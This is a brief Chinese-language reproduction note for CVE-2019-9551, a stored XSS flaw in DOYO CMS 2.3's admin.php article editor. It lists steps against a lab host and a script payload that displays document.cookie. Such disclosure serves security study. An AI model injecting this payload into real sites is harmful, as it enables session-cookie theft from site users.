漏洞描述

DOYO(又名 doyocms)2.3 中发现了一个问题。它有 admin.php存储型XSS漏洞CVE-2019-9551。
 
 

影响版本

DOYO 2.3
 
 

漏洞复现

1、登录后台:http://192.168.53.130:81/doyocms/admin.php


2、文章管理—编辑器




3、输入:

"><script>alert(document.cookie)</script>